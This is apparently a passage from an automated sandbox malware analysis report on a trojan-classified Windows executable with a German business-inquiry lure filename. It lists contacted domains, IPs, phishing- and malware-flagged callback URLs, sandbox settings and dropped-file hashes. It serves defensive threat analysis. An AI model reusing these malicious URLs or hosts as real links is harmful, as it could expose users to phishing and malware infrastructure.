          http://www.fontbureau.comalic0%URL Reputationsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.tunnelvisionconference.com
          216.250.121.17
          truetrue
            unknown
            parkingpage.namecheap.com
            198.54.117.212
            truefalse
              high
              10thring.com
              185.111.89.175
              truetrue
                unknown
                youcanstores.com
                104.19.178.121
                truetrueunknown
                williamhag.online
                185.76.64.173
                truetrue
                  unknown
                  www.nevalostrecords.com
                  66.96.162.137
                  truefalse
                    unknown
                    hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
                    54.161.222.85
                    truefalse
                      high
                      www.terrierslovjt.xyz
                      unknown
                      unknowntrue
                        unknown
                        www.williamhag.online
                        unknown
                        unknowntrue
                          unknown
                          www.tra4fficsearchtabspace.rest
                          unknown
                          unknowntrue
                            unknown
                            www.schonheitschirurg.online
                            unknown
                            unknowntrue
                              unknown
                              www.hautebazaar.net
                              unknown
                              unknowntrue
                                unknown
                                www.tsctribe.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.youcanstores.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.10thring.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.youcanstores.com/g6k0/?oT=YhpnqMeKeHQV9hpawJJ8kDg8ped7Wcc3vUTi9AzVcbGOoRzcVA1Xx6BKuahE3Ao/4185&vDKd7h=9rjLcdHx-0rtrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://www.williamhag.online/g6k0/?oT=1yOpS97qTPJuX4vdeJnQ3O9XBc/xzRMbKQW/nvdMbZZlwvnrgiUHRDWYI6wAZPcgG2JU&vDKd7h=9rjLcdHx-0rtrue
                                      • Avira URL Cloud: phishing
                                      unknown
                                      www.cannonbrookes.online/g6k0/true
                                      • Avira URL Cloud: phishing
                                      low
                                      http://www.10thring.com/g6k0/?oT=6RYluMxNX3+UBUvEGFzo52kesULJ7OMzMGVALFRE7BcQ/7Cn+C5GWBVLLjru1ffm4ceC&vDKd7h=9rjLcdHx-0rtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.terrierslovjt.xyz/g6k0/?oT=Hip7CMimOk78gxL5CMPku07nV6Z0o8C0cGWx1eP+ie71BFDKkLr5JgybhXBrWtyrNdPh&vDKd7h=9rjLcdHx-0rtrue
                                      • Avira URL Cloud: phishing
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://www.fontbureau.com/designersGAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designersFAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263004987.00000000063E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.com/designers/?Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cn/bTheAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/8%;Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262409199.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262229282.00000000063BC000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262080267.00000000063B7000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262311791.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262046709.00000000063C6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262392996.00000000063BD000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262020412.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.261812005.00000000063B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.comFRAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263629945.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263882939.00000000063C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.com/designersP4Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263123002.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263156364.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263138592.00000000063E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.fontbureau.com/designers?Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.tiro.comAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designersAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263138592.00000000063E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.fontbureau.comepkoAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.266360730.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277699072.00000000063B7000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.273864328.00000000063B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.goodfont.co.krAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.comcom9Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263629945.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263882939.00000000063C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fontbureau.com/designersRAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263138592.00000000063E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.sajatypeworks.comAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.typography.netDAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.founder.com.cn/cn/cTheAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.galapagosdesign.com/staff/dennis.htmAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264361526.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264323030.00000000063BF000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264399524.00000000063C1000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264505324.00000000063C1000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://fontfabrik.comAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.comB.TTFAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263629945.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263213779.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.comoDAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263213779.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.tiro.comxgAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.260884696.00000000063BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fontbureau.comoituaAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263629945.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263882939.00000000063C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.galapagosdesign.com/DPleaseAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com9Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263213779.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.ascendercorp.com/typedesigners.htmlAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262607800.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262461393.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262435889.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262486349.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262624012.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262537161.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262520522.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262555320.00000000063E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designersvAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263502494.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263522637.00000000063E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.fonts.comAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.sandoll.co.krAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.urwpp.deDPleaseAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.urwpp.deAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262923424.00000000063C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.zhongyicts.com.cnAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.sakkal.comAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.comDAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263629945.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263882939.00000000063C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.jiyu-kobo.co.jp/2vAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262409199.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262311791.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262392996.00000000063BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.apache.org/licenses/LICENSE-2.0Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.fontbureau.comAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.266360730.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263629945.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263213779.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277699072.00000000063B7000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.273864328.00000000063B7000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263068912.00000000063C8000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263882939.00000000063C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.galapagosdesign.com/Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264361526.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264323030.00000000063BF000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264399524.00000000063C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/RAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262409199.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262311791.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262392996.00000000063BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/MAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262409199.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262311791.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262392996.00000000063BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.urwpp.deetAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262923424.00000000063C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/jp/Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262311791.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262046709.00000000063C6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262392996.00000000063BD000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262020412.00000000063C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers/frere-jones.html8%;Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263213779.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.fontbureau.comdAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263213779.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://www.carterandcone.comlAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designersx$;Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262975141.00000000063E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.founder.com.cn/cn/Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.260884696.00000000063BE000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.260829842.00000000063BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.fontbureau.com/designers/cabarga.htmlNAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.founder.com.cn/cnAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers/frere-jones.htmlAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.monotype.Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264065084.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.264038069.00000000063BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.jiyu-kobo.co.jp/Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262020412.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.261812005.00000000063B6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.fontbureau.com/designers8Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000002.277875636.0000000007642000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.fontbureau.comalicAnfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263629945.00000000063C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.fontbureau.com/designers:Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263108496.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263449264.00000000063E6000.00000004.00000800.00020000.00000000.sdmp, Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.263426943.00000000063E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.fontbureau.com/designers/Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe, 00000000.00000003.262975141.00000000063E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            216.250.121.17
                                                                            www.tunnelvisionconference.comUnited States
                                                                            8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                            185.76.64.173
                                                                            williamhag.onlineSweden
                                                                            200719MISSDOMAINSEtrue
                                                                            198.54.117.212
                                                                            parkingpage.namecheap.comUnited States
                                                                            22612NAMECHEAP-NETUSfalse
                                                                            185.111.89.175
                                                                            10thring.comHungary
                                                                            51013WEBSUPPORT-SRO-SK-ASSKtrue
                                                                            104.19.178.121
                                                                            youcanstores.comUnited States
                                                                            13335CLOUDFLARENETUStrue
                                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                                            Analysis ID:606176
                                                                            Start date and time: 09/04/202209:10:292022-04-09 09:10:29 +02:00
                                                                            Joe Sandbox Product:CloudBasic
                                                                            Overall analysis duration:0h 10m 27s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:light
                                                                            Sample file name:Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                            Number of analysed new started processes analysed:29
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • HDC enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.evad.winEXE@7/1@10/5
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HDC Information:
                                                                            • Successful, ratio: 35.2% (good quality ratio 30.3%)
                                                                            • Quality average: 65.1%
                                                                            • Quality standard deviation: 34.6%
                                                                            HCA Information:
                                                                            • Successful, ratio: 97%
                                                                            • Number of executed functions: 0
                                                                            • Number of non-executed functions: 0
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Adjust boot time
                                                                            • Enable AMSI
                                                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, go.microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            TimeTypeDescription
                                                                            09:11:41API Interceptor1x Sleep call for process: Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe modified
                                                                            No context
                                                                            No context
                                                                            No context
                                                                            No context
                                                                            No context
                                                                            Process:C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1308
                                                                            Entropy (8bit):5.345811588615766
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4FsXE8:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHJ
                                                                            MD5:EA78C102145ED608EF0E407B978AF339
                                                                            SHA1:66C9179ED9675B9271A97AB1FC878077E09AB731
                                                                            SHA-256:8BF01E0C445BD07C0B4EDC7199B7E17DAF1CA55CA52D4A6EAC4EF211C2B1A73E
                                                                            SHA-512:8C04139A1FC3C3BDACB680EC443615A43EB18E73B5A0CFCA644CB4A5E71746B275B3E238DD1A5A205405313E457BB75F9BBB93277C67AFA5D78DCFA30E5DA02B
                                                                            Malicious:true
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.395161533542372
                                                                            TrID:
